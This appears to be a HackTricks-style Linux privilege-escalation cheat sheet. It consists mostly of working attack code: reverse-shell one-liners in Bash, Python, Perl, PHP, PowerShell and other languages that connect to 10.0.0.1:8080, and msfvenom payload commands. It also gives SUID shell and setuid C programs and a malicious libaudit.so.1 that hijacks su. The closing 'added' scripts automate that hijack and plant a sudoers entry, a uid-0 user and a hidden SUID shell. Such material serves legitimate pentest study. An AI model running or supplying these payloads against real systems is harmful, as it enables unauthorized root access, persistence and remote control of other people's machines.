Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want access to the latest version of PEASS or to download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Bash
cp /bin/bash /tmp/b && chmod +s /tmp/b   # must be executed by root: copies bash and sets the SUID/SGID bits on the copy
/tmp/b -p   # -p keeps the effective uid 0 granted by the SUID bit (bash drops it otherwise); works on Debian and Ubuntu
If /tmp is mounted nosuid the bit is silently ignored; copy the binary to a filesystem mounted without nosuid instead.
Execution payloads
The following reverse-shell one-liners are useful once you can make a process (ideally a privileged one) execute a command. Each one connects back to a listener on 10.0.0.1:8080; replace that address and port with your own.
Bash
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
This assumes the socket becomes file descriptor 3 (the first free one in a fresh php process); if you get no shell, try 4, 5 or 6.
Ruby
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 8080
The -e option exists in traditional netcat and in ncat but not in the OpenBSD netcat shipped by many distributions; use the socat payload below in that case.
Socat
socat tcp-connect:10.0.0.1:8080 exec:/bin/sh,pty,stderr,setsid,sigint,sane
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
This is Groovy syntax (note the as String[] cast), as used in a Jenkins script console or similar; in plain Java build the String[] explicitly.
xterm
xterm -display 10.0.0.1:1
Reverse X11: the target's xterm draws on display :1 of 10.0.0.1 (TCP port 6001), so you need an X server there (for example Xnest) that accepts connections from the target (xhost).
PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Windows only, listed for completeness. Note that the TCPClient object must be assigned to $client: a common copy of this one-liner omits the assignment and fails at $client.GetStream().
Metasploit
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f elf > shell.elf
Socat (Metasploit)
msfvenom -p cmd/unix/reverse_socat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh
cmd/unix/* payloads are shell command strings, not binaries, so use -f raw (not -f elf) and run the result with sh; confirm the exact payload name available in your Metasploit version with msfvenom -l payloads.
Python (Metasploit)
msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=8080 -f raw > shell.py
PHP (Metasploit)
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.php
Ruby (Metasploit)
msfvenom -p cmd/unix/reverse_ruby LHOST=10.0.0.1 LPORT=8080 -f raw > shell.rb
Netcat (Metasploit)
msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.1 LPORT=8080 -f raw > shell.sh
Java (Metasploit)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f raw > shell.jsp
War (Metasploit)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=8080 -f war > shell.war
All of these need a matching handler (exploit/multi/handler with the same payload, LHOST and LPORT) listening before the payload runs.
C
//gcc payload.c -o payload
#define _GNU_SOURCE      // setresuid() is a GNU extension
#include <stdlib.h>
#include <unistd.h>
int main(void){
    setresuid(0, 0, 0);  // real, effective and saved uid := 0; only succeeds when the euid is already 0 (SUID-root binary, or executed by root)
    system("/bin/sh");
    return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
int main(){
    setuid(geteuid()); // real uid := effective uid, so a SUID-root binary keeps uid 0 and bash does not drop it (setuid(getuid()) would do the opposite and drop the privilege)
    system("/bin/bash");
    return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    char *const paramList[10] = {"/bin/bash", "-p", NULL};
    const int id = 1000;
    setresuid(id, id, id);                 // become uid 1000 (needs euid 0, or a binary that is SUID to uid 1000)
    execve(paramList[0], paramList, NULL); // -p keeps the privilege if real and effective uids still differ
    return 0;
}
Overwriting a file to escalate privileges
If you have an arbitrary file write as root (or find one of these files unexpectedly writable by your user or group), the usual targets are:
Common files
Add a user with a password to /etc/passwd
Change the password inside /etc/shadow
Add a user to sudoers in /etc/sudoers
Abuse docker through the docker socket, usually at /run/docker.sock or /var/run/docker.sock (anyone who can talk to it can start a container with the host filesystem mounted)
Overwriting a library
Look at a library used by a certain binary, in this case /bin/su:
ldd /bin/su
	linux-vdso.so.1 (0x00007ffef06e9000)
	libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
	libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
	libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
	libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
In this case we are going to try to impersonate /lib/x86_64-linux-gnu/libaudit.so.1.
So, look for the functions of this library that the su binary uses:
objdump -T /bin/su | grep audit
0000000000000000      DF *UND*  0000000000000000  audit_open
0000000000000000      DF *UND*  0000000000000000  audit_log_user_message
0000000000000000      DF *UND*  0000000000000000  audit_log_acct_message
000000000020e968 g    DO .bss  0000000000000004  Base        audit_fd
The undefined (*UND*) symbols audit_open, audit_log_user_message and audit_log_acct_message are imported from libaudit.so.1 (audit_fd is a data object in su's own .bss, so it is not imported, although exporting it from the fake library does no harm). Since libaudit.so.1 is going to be replaced by the malicious shared library, these symbols must be present in the new library, otherwise the dynamic linker will not be able to resolve them and su will exit before running anything.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
// Exported stubs for the symbols su imports. Defining them as functions (rather
// than as int variables) means su keeps working after your shell exits instead
// of crashing when it calls into a data object; the parameter lists are left
// unspecified so the real prototypes do not matter.
int audit_open() { return -1; }
int audit_log_acct_message() { return 0; }
int audit_log_user_message() { return 0; }
int audit_fd;
// Constructor: runs when the library is loaded, before su's main().
void inject() __attribute__((constructor));
void inject()
{
    setuid(0);   // su is SUID root, so the euid is already 0; make the real uid 0 too
    setgid(0);
    system("/bin/bash");
}
Now, simply by running /bin/su, you will get a shell as root. Keep in mind that every process linking libaudit.so.1 (not only su) will load this library and run the constructor, so overwriting the system copy is disruptive; restore the original as soon as you have your shell.
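To make the symbol-hunting step above less error-prone, here is an added example (not code from the original page): a small POSIX shell helper that extracts the imported (*UND*) symbols from an objdump -T listing, generates a replacement-library source whose exports are real functions, and checks the compiled .so with nm. The objdump listing embedded in it is a constructed sample copied from the su output above; the --run entry point, the ^audit_ pattern and the inject.c / libaudit.so.1 file names are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not code from the original page: automates the
# "which symbols must the fake library export?" step of the library hijack.
# Input is an `objdump -T` listing; the one embedded here is a constructed
# sample copied from the su output. The --run entry point, the ^audit_
# pattern and the output file names are assumptions made for this example.

OBJDUMP_SAMPLE='0000000000000000      DF *UND*  0000000000000000  audit_open
0000000000000000      DF *UND*  0000000000000000  audit_log_user_message
0000000000000000      DF *UND*  0000000000000000  audit_log_acct_message
000000000020e968 g    DO .bss  0000000000000004  Base        audit_fd'

# required_symbols LISTING PATTERN
# Prints, sorted, every symbol the binary imports (*UND* lines) whose name
# matches PATTERN. Symbols defined inside the binary itself (any other
# section, e.g. audit_fd in .bss) are not imports and are left out.
required_symbols() {
    printf '%s\n' "$1" | awk -v pat="$2" '
        index($0, "*UND*") && $NF ~ pat { print $NF }' | LC_ALL=C sort
}

# gen_stub_source SYMBOL...
# Emits C source for the replacement library. Every required symbol becomes a
# real function, so the victim keeps running after the payload instead of
# crashing on a call into what would otherwise be an int in .bss. The empty
# parameter lists leave the prototypes unspecified, so the real libaudit
# signatures do not have to be known.
gen_stub_source() {
    printf '#include <stdlib.h>\n#include <unistd.h>\n'
    for sym in "$@"; do
        printf 'int %s() { return -1; } /* stub: satisfies the dynamic linker */\n' "$sym"
    done
    cat <<'EOF'
/* Constructor: runs at load time, before the victim's main(). */
__attribute__((constructor)) static void inject(void) {
    if (geteuid() == 0) {   /* fire only inside a privileged process */
        setuid(0); setgid(0);
        system("/bin/bash -p");
    }
}
EOF
}

# verify_exports LIBRARY SYMBOL...
# After compiling, confirm the .so defines every required symbol: a missing
# one makes the victim fail to start, which is both useless and noisy.
verify_exports() {
    lib="$1"; shift
    for sym in "$@"; do
        nm -D --defined-only "$lib" | awk '{ print $NF }' | grep -qx "$sym" \
            || { echo "missing export: $sym" >&2; return 1; }
    done
}

# Full procedure against a real binary (defaults to /bin/su):
#   sh hijack.sh --run /bin/su
if [ "${1-}" = "--run" ]; then
    syms=$(required_symbols "$(objdump -T "${2:-/bin/su}")" '^audit_')
    gen_stub_source $syms > inject.c
    gcc -shared -fPIC -o libaudit.so.1 inject.c \
        && verify_exports ./libaudit.so.1 $syms \
        && echo "libaudit.so.1 built; copy it over the real one to trigger"
fi
```

The geteuid() guard in the generated constructor keeps the payload from popping shells in every unprivileged process that happens to load the library, and the nm check catches the typo that would otherwise make su refuse to start.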
Scripts
Can you make root execute something (a cron job, a writable script or binary that root runs, a service hook)? Then have it run one of these:
www-data to sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
/tmp/update here is the script that root will execute. Root can append to /etc/sudoers without the chmod 777, and sudo refuses a world-writable sudoers file if anything runs it in between; a syntax error in the entry locks everyone out of sudo, so a separate file in /etc/sudoers.d checked with visudo -c is the safer variant.
Change the root password
echo "root:hacked" | chpasswd
Add a new root user in /etc/passwd
echo 'newroot:x:0:0:root:/root:/bin/bash' >> /etc/passwd
The x in the password field defers authentication to /etc/shadow, where newroot has no entry, so this only helps if you can also write /etc/shadow or switch to the user without a password. Putting the hash directly in /etc/passwd avoids that:
echo hacker:$( (mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
mkpasswd comes from the whois package; openssl passwd -1 produces md5crypt (use -6 for sha512crypt on newer OpenSSL); the last alternative is a precomputed md5crypt hash used as a fallback when neither tool is installed.
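As an added example (not from the original page), the following POSIX shell script combines the targets listed under Common files with the Scripts idea above: it is the kind of script you would get root to execute, but each step verifies its result, the sudoers change goes into a sudoers.d drop-in so a typo cannot break sudo, and the password hash is written inline so no /etc/shadow entry is needed. The ROOT_PREFIX variable, the file names and the placeholder hash are assumptions introduced here so the functions can be exercised in a scratch directory as an unprivileged user before the real run.

```shell
#!/bin/sh
# Added example, not code from the original page: a payload script of the
# kind you get root to execute (cron job, root-run script, service hook),
# applying the "common files" tricks with a check after each step.
# ROOT_PREFIX, the file names and the placeholder hash are assumptions made
# for this example; ROOT_PREFIX lets the functions be exercised against a
# scratch directory as an unprivileged user and is empty for the real run.
ROOT_PREFIX="${ROOT_PREFIX-}"

# Placeholder crypt(3) hash (md5crypt format); generate a real one with
# mkpasswd -m sha-512 or openssl passwd -6 before use.
HASH='$1$mysalt$7DTZJIc9s6z60L6aj0Sui.'

# add_sudoers_entry USER
# Writes a drop-in under sudoers.d instead of editing /etc/sudoers: a syntax
# error in /etc/sudoers locks everyone out of sudo, a bad drop-in is merely
# ignored. Requires the default "#includedir /etc/sudoers.d" in /etc/sudoers.
# When running as root, visudo -cf validates the file and removes it on error.
add_sudoers_entry() {
    dir="$ROOT_PREFIX/etc/sudoers.d"; f="$dir/90-$1"
    mkdir -p "$dir"
    printf '%s ALL=(ALL) NOPASSWD:ALL\n' "$1" > "$f" && chmod 440 "$f" || return 1
    if [ "$(id -u)" = 0 ] && command -v visudo >/dev/null 2>&1; then
        visudo -cf "$f" >/dev/null || { rm -f "$f"; return 1; }
    fi
    printf '%s\n' "$f"
}

# add_root_user NAME HASH
# Appends a uid 0 user with the hash inline in /etc/passwd (no /etc/shadow
# entry needed), then verifies the line parses: 7 fields, uid 0, gid 0.
add_root_user() {
    pw="$ROOT_PREFIX/etc/passwd"
    mkdir -p "$(dirname "$pw")"
    printf '%s:%s:0:0::/root:/bin/bash\n' "$1" "$2" >> "$pw" || return 1
    awk -F: -v u="$1" '$1 == u && NF == 7 && $3 == 0 && $4 == 0 { ok = 1 } END { exit !ok }' "$pw"
}

# install_suid_shell SRC DST
# The Bash trick from the top of the page: copy a shell and set the SUID bit,
# then check the bit actually took. On a nosuid mount chmod still succeeds
# but the kernel ignores the bit, so warn about that too (best effort).
install_suid_shell() {
    src="$1"; dst="$ROOT_PREFIX$2"
    mkdir -p "$(dirname "$dst")"
    cp "$src" "$dst" && chmod 4755 "$dst" || return 1
    [ -u "$dst" ] || return 1
    if command -v findmnt >/dev/null 2>&1 \
        && findmnt -no OPTIONS --target "$dst" 2>/dev/null | grep -q nosuid; then
        echo "warning: $dst is on a nosuid mount; the bit will be ignored" >&2
    fi
    printf '%s\n' "$dst"
}

# Real run, as root:  sh update.sh --run   (afterwards: /var/tmp/.b -p)
if [ "${1-}" = "--run" ]; then
    add_sudoers_entry www-data
    add_root_user newroot "$HASH"
    install_suid_shell /bin/bash /var/tmp/.b
fi
```

Running it with ROOT_PREFIX set to a scratch directory shows exactly which files the real run will touch and lets you confirm the passwd line parses before you burn your one shot at root.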